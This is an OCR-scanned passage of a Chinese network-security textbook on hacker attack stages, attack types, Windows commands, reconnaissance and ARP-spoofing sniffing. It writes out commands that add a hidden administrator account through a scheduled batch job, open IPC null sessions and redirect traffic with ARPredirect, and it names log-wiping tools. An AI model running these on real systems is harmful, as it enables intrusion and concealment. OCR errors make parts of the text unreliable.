
为 了 不 给 自己 招来 麻烦 ,黑客 必须 遵守 行业 内 的 12 条 行为 准则 : 

(1) 不 恶意 破坏 系统 ; 

(2) 不 修改 系统 文件 ; 

(3) 不 破坏 别人 的 应 用 软件 和 资料 ; 

(4) 不 把 要 入 侵 或 已 人 侵 的 站 点 告诉 不 信任 的 朋友 ; 

(5) 在 发 表 黑客 文章 时 不 用 真名 ; 

(6) 人 侵 时 不 随意 离开 用 户主 机 ; 
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(7) 不 入 侵 或 破坏 政府 机 关系 统 ; 

(8) 不 在 电话 中 谈 入 侵 事 项 ; 

(9) 将 入 侵 笔记 保管 好 , 放 在 安全 的 地 方 ; 

(10) 尽量 保持 原 系统 的 安全 性 ,不 能 因为 得 到 系统 的 控制 权 而 将 门户 大 开 ; 

(11) 不 删除 或 涂改 已 人 侵 主机 的 账号 ; 

(12) 不 与 朋友 分 享 已 破解 的 账号 。 

4. 黑色 产业 链 需求 

(1) 网 站 搜索 人 为 排名 。 这 是 现代 电 商 的 需求 ,要 求 自己 的 网 站 在 搜索 引擎 的 搜索 结 
果 中 排名 靠 前 ,以 推广 自己 的 产品 或 知名 度 。 其 中 SEO 称 为 搜索 引擎 优化 ,而 SEM 就 是 搜 
索引 擎 营销 。 

(2) 游戏 外 挂 开 发 。 一 个 游戏 外 挂 可 以 养活 一 个 人 一 辈子 ,属于 暴利 产业 。 一 般 针 对 
国外 游戏 开发 ， 以 求 避 开 法 律 责任 。 

(3) 网 络 渗透 。 开 辟 可 控制 网 络 的 疆域 。 

(4) 买卖 木马 。 使 用 木马 偷窃 重要 资料 或 账号 ,形成 了 专门 制 马 、. 卖 马 , 种 马 和 控 马 的 
用 户 群 和 利益 链条 。 

(5) 买卖 游戏 装备 ,虚拟 币 ,个 人 数据 或 重要 资料 。 这 种 需求 给 黑客 提供 了 广泛 市 场 。 

5. 黑客 攻击 的 特点 

(1) 攻击 工具 简单 化 。 目 前 ,黑客 工具 的 技术 性 越 来 越 高 ,使 用 越 来 越 简单 ,并 且 大 多 
是 图 形 化 界面 ,容易 操作 或 自动 攻击 ,攻击 所 需 专 业 知 识 越 来 越 少 。 

(2) 攻击 目标 针对 化 。 黑 客 攻击 的 目标 越 来 越 有 针对 性 ,并 且 主要 是 针对 意识 形态 和 
商业 活动 ,如 Yahoo 事件 。 

(3) 攻击 方式 系统 化 。 黑 客 在 攻击 方式 .时 间 和 规模 等 方面 一 般 都 进行 了 长 时 间 的 准 
备 和 部 署 ,系统 地 进行 攻击 ,攻击 由 点 转向 分 布 式 大 范围 以 及 基于 浏览 器 的 Web 方式 。 

(4) 攻击 时 间 持 续 化 。 由 于 网 络 协议 的 漏洞 和 追踪 力量 的 薄弱 ,黑客 肆 无 尽 悦 地 对 目 
标 进 行 长 时 间 的 攻击 。 例 如 ,cnns. net 网 站 曾 承受 过 长 达 40 余天 的 DDoS 攻击 。 

(5) 攻击 组 织 化 。 黑 客 由 原来 的 单 兵 作 战 变 成 有 组 织 的 黑客 群体 ,相互 交流 经 验 ,协调 
统一 行动 ,以 增加 成 功率 。 


8.1.2 黑客 攻击 的 一 般 过 程 


收集 信息 
黑客 攻击 的 一 般 步骤 和 过 程 如 图 8. 1 所 示 。 包 括 收集 信 
息 . 入 侵 攻 击 、 提 升 权限 、 窃 取 资 料 、 保 持 访问 、 掩 迹 和 拒绝 服务 | 入侵 攻击 入、 失败 
攻击 等。 成 中? 
1 收集 信息 | 提升 权限 | | 拒绝 访问 攻击 


黑客 确定 了 攻击 目标 后 ,一般 要 收集 被 攻击 者 的 信息 。 [而 
， 目 标 机 的 类 型 .IP 地 址 ,所 在 网 络 的 类 型 ， 

。 操 作 系统 的 类 型 .版 本 ; [RR 
。 系 统管 理 人 员 的 名 字 、 邮 件 地 址 等 ; 

目标 系统 开放 的 端口 .服务 信息 等 。 [Ca] 
为 了 获得 这 些 信息 ,黑客 要 利用 一 些 工具 和 技术 ,进行 信 图 8.1 黑客 攻击 的 一 般 过 程 
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息 查 询 、 嗅 探 与 监听 扫描 和 查 点 。 

(1) 信息 查询 

利用 Internet 信息 服务 ,查询 目标 IP 的 域名 或 主机 信息 ,例如 通过 对 whois 数据 库 的 
查询 ,黑客 能 够 得 到 以 下 用 于 发 动 攻击 的 重要 信息 一 一 注册 机 构 ,得 到 特定 的 注册 信息 和 相 
关 的 whois 服务 器 。 利 用 DNS 区 域 传送 工具 dig nslookup 及 Windows 版 本 的 Sam Spade 
获取 目标 域 中 的 所 有 主机 信息 。 

利用 DOS 命令 查看 主机 的 信息 ,例如 运行 一 个 host 命令 ,可 以 获得 被 攻击 目标 机 的 IP 
地 址 信息 ,还 可 以 识别 出 目标 机 操作 系统 的 类 型 。 

(2) 嗅 探 与 监听 

嗅 探 sniff 是 利用 嗅 探 器 来 窃听 网 络 上 流 经 的 数据 包 , 对 数据 包 进 行 分 析 来 监听 一 些 敏 
感 信 息 , 如 账号 和 密码 等 。 

(3) 扫描 

系统 的 漏洞 会 为 攻击 提供 机 会 和 入 口 。 黑 客 常 编写 或 收集 适当 的 工具 ,在 较 短 的 时 间 
内 对 目标 系统 进行 扫描 ,确定 攻击 对 象 的 存活 性 、 开 放 的 端口 和 服务 、 系 统 的 漏洞 等 ,进一步 
收集 攻击 目标 的 信息 。 

(4) 查 点 

查 点 就 是 对 收集 的 攻击 对 象 信息 进行 分 析 ,找到 被 攻击 对 象 的 脆弱 点 ,确定 攻击 入 口 点 
和 攻击 方法 。 如 特定 系统 上 的 用 户 .用 户 组 名 、 路 由 表 、SNMP 信息 ,共享 资源 、 服 务 程序 及 
旗 标 等 信息 。 

查 点 采用 的 技术 依 操作 系统 而 定 。Windows 系统 上 主要 检查 NetBIOS 线路 、 空 会 话 
(Null Session) SNMP 代理 和 活动 目录 (Active Directory) 等 。UNIX 系统 上 主要 有 PRG 
查 点 NIS 查 点 ,NFS 查 点 和 SNMP 查 点 。 

2. 入 侵 攻击 

根据 收集 的 信息 和 分 析 得 到 的 攻击 点 ,选用 适当 的 攻击 方法 和 工具 进行 攻击 测试 ,找到 
人 侵 的 途径 ,获取 目标 系统 的 访问 权限 。 

攻击 者 在 攻击 开始 前 往往 隐藏 自己 的 身份 如 IP 地 址 ,攻击 目标 是 获取 访问 权 或 破坏 系 
统 。 获 取 访 问 权 是 入 侵 的 正式 开始 ,最 好 的 方法 是 获取 登录 账号 和 口令 。 

攻击 Windows 系统 的 主要 技术 有 NetBIOS-SMB 密码 猜测 、 窃 听 LM 及 NTLM 认证 
散 列 (LAN Manager Challenge/ Response) ,攻击 IIS Web 服务 器 和 远程 缓冲 区 溢出 等 。 

攻击 UNIX 系统 的 主要 技术 有 蛮 力 密码 攻击 、 密 码 窃听 数据 驱 动 式 攻击 (如 缓冲 区 洪 
出 ,输入 验证 ,字典 攻击 等 )、RPC 攻击 、NFS 攻击 和 针对 X-Windows 系统 的 攻击 等 。 

3. 权限 提升 

和 人 侵 的 目的 就 是 完全 控制 目标 系统 ,对 敏感 数据 的 窃取 或 破坏 ( 自 改 添加、 删除 ) ,以 及 
通过 对 敏感 数据 的 分 析 ,为 进一步 攻击 应 用 系统 做 准备 。 

但 攻击 所 获得 的 用 户 权限 往往 很 低 , 不 能 完全 控制 目标 系统 ,因此 黑客 需要 将 获得 的 普 
通用 户 权 限 提 升 至 超级 用 户 权 限 。 权 限 提升 的 主要 技术 是 管理 员 口 令 破解 ,利用 漏洞 以 及 
不 当 配 置 等 。 

4. 窃取 资料 

窃取 目标 系统 中 的 重要 数据 资料 ,必要 时 适当 修改 系统 的 数据 或 配置 ,达到 攻击 目标 。 
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5. 保持 访问 

为 了 能 持续 访问 目标 系统 ,需要 给 目标 系统 安装 木马 或 植 入 后门 ,以 特权 用 户 身份 控制 
整个 系统 ,窃取 有 用 数据 或 信息 。 

6. 掩 迹 

掩 迹 , 即 清除 或 掩盖 自己 所 有 的 人 侵 痕 迹 。 主 要 工作 有 禁止 系统 审计 、 隐 藏 作 案 工 具 、 
修改 或 清空 事件 日 志 ( 使 用 zap .wzap 和 wted 等 ) .替换 系统 常用 操作 命令 等 。 

7. 拒绝 服务 攻击 

拒绝 服务 攻击 (DOS) 是 指 利用 协议 或 不 同系 统 实现 的 漏洞 ,使 目标 系统 资源 耗 尽 或 过 
载 ,没有 能 力 向 外 提供 服务 的 攻击 。DOS 攻击 往往 是 入 侵 失 败 的 最 后 手段 。 


8.1.3 黑客 攻击 分 类 


安全 攻击 在 X.800 和 RFC 2828 中 分 为 两 类 : 被 动 攻击 和 主动 攻击 。 被 动 攻击 试图 获 
得 或 利用 系统 的 信息 ,但 不 会 对 系统 的 资源 造成 破坏 。 而 主动 攻击 则 不 同 , 它 试 图 破坏 系统 
的 资源 ,影响 系统 的 正常 工作 。 

1. 被 动 攻击 

被 动 攻击 是 被 动 获得 敏感 信息 ,攻击 方法 是 对 所 传输 的 信息 进行 窃听 和 监测 ,攻击 目标 
是 获得 通信 线路 上 所 传输 的 信息 。 信 息 泄露 和 流量 分 析 就 是 两 种 被 动 攻击 的 例子 。 

窃听 攻击 利用 窃听 工具 截获 电子 邮件 和 传输 的 文件 中 可 能 的 敏感 或 秘密 信息 。 

流量 分 析 是 攻击 者 通过 分 析 通 信 流 量 获得 秘密 消息 的 传输 模式 ,观察 传输 消息 的 频率 
和 长 度 ,确定 通信 身份 及 其 所 处 的 位 置 , 或 推断 本 次 通信 的 性 质 。 

被 动 攻击 由 于 不 涉及 对 数据 的 更 改 , 因 此 很 难 被 察觉 。 通 过 采用 加 密 措施 ,完全 有 可 能 
阻止 这 种 攻击 。 因 此 ,处 理 被 动 攻击 的 重点 是 预防 ,而 不 是 检测 。 

2. 主动 攻击 

主动 攻击 是 指 恶 意 算 改 数据 流 或 伪造 数据 流 等 攻击 行为 , 它 分 为 4 类 。 

(1) 伪装 攻击 。 伪 装 攻击 是 指 某 个 实体 假装 成 其 他 实体 ,对 目标 发 起 攻击 。 例 如 攻击 
者 捕获 认证 信息 ,伪装 成 合法 用 户 ,然后 将 其 重 发 。 

(2) 重 放 攻击 。 重 放 攻 击 是 指 攻击 者 为 了 达到 某 种 目的 ,将 获得 的 信息 再 次 发 送 ,以 在 
非 授权 的 情况 下 进行 传输 ,可 能 获得 其 他 实体 所 拥有 的 访问 权限 。 

(3) 消息 算 改 。 消 息 算 改 是 指 攻击 者 对 截获 的 合法 消息 中 的 一 部 分 进行 修改 或 延迟 消 
息 的 传输 ,以 达到 攻击 目的 。 

(4) 拒绝 服务 攻击 。 拒 绝 服务 攻击 是 指 阻止 或 禁止 系统 服务 或 设备 的 正常 使 用 。 

主动 攻击 与 被 动 攻击 相反 ,被 动 攻击 难以 检测 ,但 采取 某 些 安全 防护 措施 就 可 以 有 效 阻 
止 ;主动 攻击 虽然 易于 检测 ,但 却 难以 阻止 。 所 以 对 付 主动 攻击 的 重点 应 当 放 在 如 何 检测 并 
发 现 它们 上 ,并 采取 相应 的 应 急 响应 措施 ,并 使 系统 从 故障 状态 恢复 到 正常 运行 。 


8.1.4 黑客 常用 命令 


DOS 命令 的 使 用 格式 大 多 是 “命令 名 [参数 ]”。 一 般 可 以 用 “/?” 参 数 或 不 加 参数 来 查 
看 帮助 ,有 些 命令 参数 可 以 使 用 通配符 * ”和 “?”, 其 中 * ”代表 任意 个 任何 字符 ,“?” 只 代 
表 一 个 任意 字符 。 一般 驱动 器 和 路 径 是 可 选项 参数 ,如 果 不 指明 就 默认 为 当前 驱动 器 或 当 
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前 目录 。 

重 定向 符号 “到 ?或 “之 ?用 于 改变 命令 的 结果 输出 方向 。 例 如 ,tlntadmn < test. txt 是 
指 把 test. txt 的 内 容 赋值 给 tlntadmn 命令 ,用 于 自动 添加 参数 ;而 dir>test. txt 将 执行 结 
果 输 出 到 test. txt 文件 。 后 台 执 行 *“@” 表 示 @ 后 面 的 命令 在 后 台 执行 ,但 不 会 显示 出 结果 。 
例如 @dir c:\winnt 之 过 d:\log. txt, 后 台 执 行 dir, 并 把 结果 存在 d:\log. txt 中 。“ 二 ” 指 覆 
盖 “ 之 之 " 指 添加 保存 。 

1. 常用 内 部 命令 

(1) ping。 通 过 发 送 “ 网 际 消息 控制 协议 (ICMP)” 回 响 请 求 消息 来 验证 与 男 一 台 TCP/ 
IP 计算 机 的 IP 级 连接 。 回 响应 答 消 息 的 接收 情况 将 和 往返 过 程 的 次 数 一 起 显示 出 来 。 
ping 是 用 于 检测 网 络 连接 性 .可 到 达 性 和 名 称 解析 。 其 中 : 

。-] Size: 指定 发 送 的 回响 请 求 消息 中 “数据 ?字段 的 字 节 长 度 。size 默认 值 为 32, 最 大 

值 是 65 527。 

。-t: 表示 将 不 间断 地 向 目标 IP 发 送 数 据 包 ,直到 按 Ctrl 十 C 组 合 键 强迫 其 停止 。 

。-n: 定义 向 目标 IP 发 送 数 据 包 的 次 数 ,默认 为 3 次 。 

从 TTL 的 返回 值 可 以 初步 判断 目标 主机 的 操作 系统 ,因为 这 个 值 是 可 以 修改 的 。 例 如 
TTL 和 130 表示 可 能 是 Windows 系统 ;TTL=240 一 255 则 表示 目标 主机 可 能 是 UNIX 系统 。 

(2) nbtstat。 显 示 本 地 计算 机 和 远程 计算 机 的 基于 TCP/IP(NetBT) 协 议 的 NetBIOS 
统计 资料 .NetBIOS 名 称 表 和 NetBIOS 名 称 缓存 。Nbtstat 可 以 刷新 NetBIOS 名 称 缓存 和 
注册 的 Windows Internet 名 称 服 务 (WINS) 名 称 。 使 用 不 带 参数 的 nbtstat 显示 帮助 。 
Nbtstat 命令 行 参数 区 分 大 小 写 。 其 中 ， 

。 -a remotename: 显示 远程 计算 机 的 NetBIOS 名 称 表 。 

。-A IPAddress: 显示 目标 IP 计算 机 的 NetBIOS 名 称 表 。 
。-n: 列 出 本 地 机 器 的 NETBIOS 信息 。 

。-s: 列 出 目标 IP 的 会 话 表 信 息 。 

(3) netstat。 显 示 活 动 的 TCP 连接 .计算 机 侦 听 的 端口 .以太 网 统计 信息 .IP 路 由 表 、 
IPv4 统计 信息 (对 于 IP、JICMP、TCP 和 UDP 协议 ) 以 及 IPv6 统计 信息 。 使 用 时 如 果 不 带 
参数 ,netstat 显示 活动 的 TCP 连接 。 其 中 : 

。 -a IP: 显示 所 有 活动 的 TCP 连接 以 及 计算 机 侦 听 的 TCP 和 UDP 端口 。 由 此 可 以 
有 效 发 现 和 预防 木马 ,可 以 知道 计算 机 打开 的 服务 等 信息 。 可 以 看 出 本 地 机 器 是 否 
开放 有 FTP 服务 .Telnet 服务 .邮件 服务 和 Web 服务 等 。 
-r: 列 出 本 地 机 器 的 当前 路 由 信息 ,如 网 关 、 子 网 掩 码 等 信息 。 
-n: 查看 端口 的 网 络 连 接 情 况 , 常 用 netstat-an。 
-v: 查看 正在 进行 的 工作 。 
-p: 协议 名 ,例如 netstat-p tcq/ip 查看 某 协议 使 用 情况 。 

(4) tracert。 跟 踪 路 由 信息 ,使 用 此 命令 可 以 查 出 数据 从 本 地 机 器 传输 到 目标 主机 所 
经 过 的 所 有 途径 ,这 对 了 解 网 络 布局 和 结构 很 有 帮助 。 这 里 说 明 数据 从 本 地 机 器 传输 到 
192. 168.0. 1 的 机 器 上 ,中 间 没 有 经 过 任何 中 转 , 说 明 这 两 台 机 器 是 在 同一 段 局 域 网 内 。 用 
法 : tracert IP。 


tracert -参数 记 (或 计算 机 名 ) 跟踪 路 由 (数据 包 ) 
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参数 “-w 数字 ?用 于 设置 超时 间隔 。 
(5) net。 最 重要 的 一 个 网 络 命令 ,输入 net /? 可 以 查看 帮助 。 例 如 : 
。 net view\\IP: 查看 远程 主机 的 所 有 共享 资源 。 


net use: 连接 远程 主机 ,将 某 个 共享 资源 映射 为 本 地 盘 符 。 

net use x:\\IP\sharename: 把 IP\sharename 的 共享 目录 映射 为 本 地 的 X 盘 。 
net use \\ip\ipc$ " " /user:"": 建立 IPC 空 链 接 。 

net use \\ip\ipc 名 "密码 " /user:" 用 户 名 ": 建立 IPC 非 空 链接 。 

net use \\ip\ipc$ /del: 删除 IPC 链接 。 

net use h: /del: 删除 映射 对 方 到 本 地 的 为 H: 的 映射 。 

net user: 查看 和 账户 有 关 的 情况 。 

net user 用 户 名 ”密码 ”/add: 建立 用 户 到 user 组 。 

net user guest /active:yes: 激活 guest 用 户 。 

net localgroup administrators 用 户 名 /add: 把 “用户” 添加 到 管理 员 中 ,使 其 具有 管 
理 员 权 限 ( 黑 客 提 权 )。 

net start: 查看 开启 了 哪些 服务 。 

net start telnet: 启动 远程 主机 上 的 telnet 服务 。 

net stop servername: 停止 远程 主机 上 的 servername 服务 。 

net time \\ 目 标 ip: 查看 目标 ip 的 主机 时 间 。 

net view: 查看 本 地 局 域 网 内 开启 了 哪些 共享 。 

net config: 显示 系统 网 络 设置 。 

net share: 查看 本 地 开启 的 共享 。 


(6) at。 在 特定 日 期 或 时 间 执行 某 个 特定 的 命令 和 程序 。 用 法 : at time 命令 名 。 如 执 
行 制定 路 径 的 批 处 理 aa. bat 后 ,再 反复 定时 执行 ,内 容 如 下 


net user hack321* admin321* /add & net localguoup administrators hack321* /add & at 08:22 c: 
\windows\ system32\aa.bat 


其 中 & 代表 同时 执行 ,相当 于 and。 


2, 


其 他 命令 


Attrib[+ |- 属 性 ] 文件 名 


显示 ,设置 或 删除 指派 给 文件 或 目录 的 属性 。 十 表示 设置 ,一 表示 去 掉 设置 ,属性 有 只 
读 (r) ,存档 (a) 、 系 统 (s) 和 隐藏 (h)4 种 。 

ipconfig 显示 所 有 当前 的 TCP/IP 网 络 配置 值 .刷新 动态 主机 配置 协议 (DHCP) 和 域名 
系统 (DNS) 设 置 。 


Tasklist: 显示 进程 名 称 、ID、 模 块 与 使 用 内 存 。 
Taskkill: 结束 指定 进程 或 模块 。 

wmimgmt. msc: 打开 Windows 管理 体系 结构 。 
wupdmgr: 打开 Windows 更 新 程序 ,连接 微软 更 新 网 站 。 
wscript: Windows 脚本 宿主 设置 。 

mstsc: 远程 桌面 连接 。 
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。 route: 建立 路 由 ,可 以 建立 计算 机 的 静态 路 由 或 动态 路 由 。 
。 set: 查看 显示 ,设置 或 删除 计算 机 cmd. exe 环境 变量 。 


8.2 信息 收集 


8.2.1 查询 


1. 利用 信息 服务 查询 

(1) whois 服务 。whois 是 Internet 域名 注册 数据 库 , 通 过 它 攻击 者 可 以 收集 到 Web 
网 站 如 下 信息 : 网 站 注册 机 构 、 网 站 域名 .主机 信息 、 网 站 IP 地 址 分 配 、 网 站 管理 人 员 信 息 
(如 姓名 .电子 邮件 和 电话 号 码 ) 等 。 目 前 可 用 的 whois 数据 库 很 多 ,例如 查询 com ,net edu 
及 org 等 结尾 的 域名 可 通过 http://www. networksolutions. com 得 到 ,而 查询 美国 以 外 的 
域名 则 应 通过 查询 http://www. allwhois. com 得 到 。 得 到 相应 whois 数据 库 服 务 器 的 地 
址 后 完成 进一步 的 查询 。 

(2) DNS 域名 转换 。DNS 提供 域名 与 IP 地 址 之 间 的 转换 ,攻击 者 只 需 实施 一 次 转换 ， 
就 能 得 到 目标 系统 (网 络 ) 的 所 有 主机 名 称 和 内 部 IP 地 址 。 

(3) LDAP 服务 。 攻 击 者 可 以 使 用 LDAP(Light Directory Access Protocol, 简 化 目录 
访问 协议 ) 服 务 窥探 网 络 内 部 的 系统 及 其 用 户 信息 。 

(4) NIS 服务 。NISCNetwork Information Service ,网 络 信息 服务 ) 是 为 分 布 式 网 络 环 
境 设 计 的 一 个 统一 管理 系统 , 它 把 公共 的 配置 文件 ,如 用 户 账号 和 口令 文件 ,用户 组 文件 . 主 
机 名 与 IP 对 应 文件 转变 成 一 种 映射 数据 结构 。 攻 击 者 非法 获取 NISVNIS 十 的 使 用 权 后 ,就 
可 以 获取 有 关 信 息 。 

2. 利用 命令 获取 信息 

利用 ping .Tracert/ traceroute 和 nslookup 等 DOS 命令 查找 域名 和 IP 地 址 ,或 者 利用 
Telnet rusers,finger ,host/nslookup、showmount 和 rpcinfo 等 UNIX 命令 获取 目标 信息 。 
例如 : 

C:\>tracert www.sohu.com 


Tracing route to fgz.a.sohu.com [121.14.0.97] 
over a maximum of 30 hops: 


于 基 * 关 Request timed out . 
2 lms <lms <lms 192.168.189.221 
3 <lms <lms <lms 192.168.188.49 
4 lms lms lIms 192.168.254.10 
5 关 关 关 Request timed out . 
6 3ms 2ms 3ms 222.243.160.57 
是 lms lms 2ms 220.170.5.205 
8 4ms 4ms 关 但 -137.3.57 
9 lO0ms ms ms 202.97.77.25 
10 10ms 1lms ms 113.108.208.86 
11 lO0ms lO0ms lO0ms 113.108.209.226 
12 23ms lms 123ms 58.63.232.186 
由 ms ms lO0ms 121.14.0.97 
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Trace complete 


rusers 和 finger 收集 目标 计算 机 上 有 关 用 户 的 消息 。 

host 命令 和 标准 nslookup 查询 相同 ,显示 DNS 域名 解析 经 过 的 路 由 。 

Telnet 命令 使 用 23 号 端口 登录 目标 计算 机 进入 Shell 状态 。 指 定 为 其 他 端口 可 以 观 
察 到 目标 计算 机 在 该 端口 上 的 输出 ,并 可 以 在 该 端口 输入 命令 (如 登录 110 号 端口 ,就 可 以 
接收 或 删除 邮件 服务 器 上 的 邮件 )。 


8.2.2 网 络 嗅 探 与 监听 


网 络 嗅 探 是 指 利用 计算 机 的 网 络 接口 截获 其 他 计算 机 在 网 络 上 传输 的 数据 报 文 并 分 析 
出 敏感 信息 的 一 种 手段 ,网 络 嗅 探 的 基础 是 数据 包 捕获 。 网 络 嗅 探 器 是 为 网 络 管理 员 配备 
的 工具 ,并 接 在 网 络 中 来 实现 数据 包 捕获 ,查找 网 络 漏洞 和 检测 网 络 性 能 ,分 析 网 络 流量 , 找 
出 网 络 阻塞 的 来 源 ,掌握 网 络 的 实际 情况 。 常 为 黑客 利用 。 

网 络 监听 是 一 种 利用 嗅 探 原 理 来 监视 网 络 状态 .数据 流程 以 及 网 络 上 信息 传输 的 方法 。 
网 络 监听 器 也 是 一 种 网 络 管理 工具 ,可 以 截获 网 络 上 所 传输 的 敏感 信息 并 友好 地 解析 给 用 
户 。 黑 客 可 以 在 人 侵 主 机 上 利用 它 来 有 效 地 截获 网 络 上 的 数据 ,伺机 得 到 同一 网 段 其 他 主 
机 的 登录 密码 ,这 是 黑客 进行 跳板 攻击 的 最 好 方法 。 

1. 基本 概念 

(1) 共享 式 局 域 网 。 共 享 式 局 域 网 是 指 同 一 网 段 的 网 络 所 有 接口 都 有 访问 在 物理 媒体 
上 传输 数据 的 能 力 的 网 络 , 例 如 以 太 网 ,一 般 采 用 集线器 (Hub) 连 接 网 络 设备 ,如 图 8. 2 
所 示 。 


Hub 工 作 原 理 


计算 机 A 计算 机 B 计算 机 C 计算 机 D 
监听 者 传输 的 数据 一 一 ~ 
计算 机 A 给 C 发 送信 息 连接 的 网 线 一 


图 8.2 Hub 的 工作 原理 


共享 式 局 域 网 工作 方式 是 将 要 发 送 的 数据 包 发 往 目标 主机 的 同时 ,由 集线器 广播 给 连 
接 在 一 起 的 所 有 主机 ,在 报 文 头 部 包含 接收 该 数据 报 的 主机 MAC 地 址 。 主 机 检查 接收 到 
的 数据 包 , 只 有 物理 地 址 是 自己 的 数据 包 才 交 给 上 层 (IP 层 ) 协 议 软件 处 理 , 和 否则 丢弃 该 帧 。 
(2) 交换 式 局 域 网 。 交 换 式 局 域 网 是 由 交换 机 连接 计算 机 的 局 域 网 络 , 计 算 机 首先 将 


314 


第 8 章 医 浊 


报 文 发 送 给 交换 式 设备 ,交换 式 设备 会 查看 数据 报 中 的 目标 地 址 ,根据 MAC 地 址 转发 数据 
报 文 给 目的 主机 。 数 据 包 的 帧 由 交换 设备 准确 转发 给 物理 地 址 标示 的 计算 机 ,如 果 声 明 为 
广播 或 组 播 的 报 文 , 则 发 给 相应 计算 机 组 或 所 有 计算 机 。 

(3) 网 卡 工作 模式 。 一 般 计 算 机 网 卡 有 4 种 工作 模式 : 

。 广播 模式 : 接收 或 发 送 网 络 中 的 广播 报 文 ; 

。 组 播 模式 : 接收 或 发 送 网 络 中 的 组 播报 文 ; 

。 直接 模式 : 只 能 接收 目标 地 址 指定 为 该 网 卡 的 报 文 ; 

。 混杂 模式 : 网 卡 能 接收 网 络 中 的 所 有 数据 报 文 ,不论 是 否 传送 给 它 。 

混杂 模式 能 接收 任何 目标 MAC 地 址 的 报 文 ,为 网 络 嗅 探 和 监听 创造 了 条 件 。 

2 网络 嗅 探 与 监听 原理 

1) 网 卡 对 报 文 的 处 理 过 程 。 如 图 8. 3 所 示 ,网 卡 接 收 到 数据 报 文 后 查看 其 目标 MAC 
地 址 ,如 果 与 自己 的 MAC 匹配 或 包含 在 其 中 (如 广播 或 组 播 ), 则 产生 中 断交 上 层 IP 协议 
软件 处 理 ; 若 不 是 发 送 给 自己 的 报 文 , 则 判断 网 卡 是 处 在 什么 工作 模式 ,是 混杂 模式 则 处 理 ， 


否则 丢弃 该 报 文 。 


查看 数据 包 MAC 地 址 


本 地 接口 地 址 或 广播 地 址 ET 
MAC 地 址 类 型 


混杂 模式 


其 他 硬件 地 址 


非 混杂 模式 


产生 中 断 ， 通 知 CPU 不 处 理 ， 丢 弃 


图 8.3 网 卡 对 报 文 的 处 理 过 程 


2) 在 共享 网 络 中 的 嗅 探 。 共 享 信道 是 数据 包 嗅 探 捕获 信息 的 根本 所 在 。 当 局 域 网 中 
的 某 台 计算 机 将 网 络 接口 配置 成 混杂 (Promiscuous) 模 式 后 ,就 可 以 接收 网 络 上 的 所 有 报 文 
和 数据 帧 了 。 这 人 台 计算 机 上 安装 的 用 于 处 理 捕获 报 文 的 软件 就 是 一 个 嗅 探 器 。 嗅 探 器 工作 
在 网 络 环境 中 的 底层 , 它 会 “ 嗅 "到 所 有 在 网 络 上 传输 的 数据 。 如 果 网 络 中 的 账号 和 口令 都 
是 以 明文 形式 传输 的 ,就 可 能 被 黑客 直接 嗅 探 到 。 

3) 交换 式 网 络 上 的 嗅 探 。 交 换 式 网 络 不 是 共享 网 络 , 即 使 嗅 探 主机 的 网 卡 设置 为 混杂 
模式 ,也 无 法 收 到 发 往 其 他 主机 的 数据 包 。 

有 两 种 方法 实现 交换 式 网 络 的 嗅 探 : 

(1) MAC 洪水 致 育 交 换 机 。 向 交换 机 发 送 大 量 的 含 虚假 MAC 和 IP 地址 的 数据 包 ， 
使 交换 机 无 法 处 理 而 工作 异常 , 即 处 于 “失效 模式 "。 这 时 的 交换 机 只 能 成 为 一 个 普通 的 集 
线 器 ,将 向 所 有 计算 机 端口 发 送 数据 包 。 这 样 攻击 者 就 可 以 嗅 探 或 监听 到 所 需 数据 了 。 

(2) ARP 网 关 欺 骗 。 网 关 是 一 个 网 络 与 其 他 网 络 之 间 的 接口 ,所 有 发 往 其 他 网 络 的 数 
据 包 都 必须 经 过 网 关 转 发 , 即 一 个 局 域 网 上 发 往 其 他 网 络 的 数据 帧 的 目标 地 址 都 是 指向 网 
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关 的 。 在 交换 环境 中 ,将 攻击 计算 机 伪装 成 为 网 关 , 可 以 嗅 探 或 监听 通信 。 由 于 局 域 网 中 通 
信 时 ,计算 机 都 将 刷新 自己 的 ARP 缓存 表 , 以 防 对 方 MAC 地 址 更 新 ,因此 嗅 探 计算 机 可 以 
给 通信 双方 发 送 网 关 的 ARP 应 答 ,告诉 它们 自己 是 网 关 , 使 它们 通信 的 数据 包 重 定向 发 给 
自己 ,再 各 自转 发 给 它们 ,从 而 完成 嗅 探 或 监听 。 

如 图 8.4 所 示 ,一 个 交换 网 络 中 有 三 台 主 机 ,A 的 IP 地址 为 202.113.240.1;B 的 IP 地 
址 为 202. 113. 240. 2, 是 入侵 者 ;C 的 IP 地 址 为 202. 113. 240. 3 ,是 网 关 。 


嗅 探 者 B 
_ IP:10.1.1.3 
(已 MAC:20-53-52-43-00-03 


Trouter 


Switch 的 MAC 地 址 表 


switch 


Username:hema009<cr> 
Password:hiHKK234<cr> 服务 器 C 

IP:10.1.1.1 
MAC:20-53-52-43-00-01 


普通 用 户 A 
IP:10.1.1.2 
MAC:20-53-52-43-00-02 


FTP 
图 8.4 ARP 网 关 地 址 欺骗 


在 正常 情形 下 ,B 无 法 收 到 A 与 C 之 间 的 通信 报 文 。 但 是 , 若 在 B 上 运行 ARP 欺骗 的 
软件 ARPredirect(dsniff 软件 的 一 部 分 ) ,并 发 出 一 条 命令 : 


ARPredirect -七 202.113.240.2 202.113.240.3 


就 可 以 将 该 网 络 中 主机 发 送 的 数据 报 文 重 定向 ,ARPredirect 就 开始 向 A 发 假冒 的 ARP 应 
答 , 说 BB 是 网 关 ;A 就 会 刷新 自己 的 缓存 ,将 B 的 硬件 地 址 作为 网 关 地 址 保存 。 这 样 , 当 A 
需要 同 其 他 网 络 中 的 主机 进行 通信 时 ,就 会 依据 缓存 中 的 网 关 地 址 (现在 是 B) , 先 把 数据 包 
发 往 B;B 可 以 先 窃取 A 发 出 的 数据 包 中 的 有 关 信 息 , 再 用 IP 转发 或 其 他 软件 将 这 些 数据 
包 转 发 到 C。 对 A 来 说 ,一 切 都 非常 正常 ,但 有 关内 容 已 经 被 窃 去 。 

3. 网 络 监听 器 

网 络 监听 扩展 了 嗅 探 功 能 ,网 络 监听 器 具有 功能 强大 的 监视 过 滤器 ,可 以 根据 API 名 
字 ,协议 类 型 .进程 名 字 、 本 地 IP/ 端 口 、 远 程 IP/ 端 口 任意 组 合 过 滤 ; 可 以 详细 地 查询 API 
发 生 的 调用 的 类 型 源 IP/ 端 口 .目标 IP/ 端 口 线程 ,进程 时间、 结果 ,错误 信息 ,数据 流 等 ; 
可 以 控制 API 调用 的 速度 ,能 够 动态 修改 API 调用 前 参数 数据 与 API 调用 后 返回 数据 的 
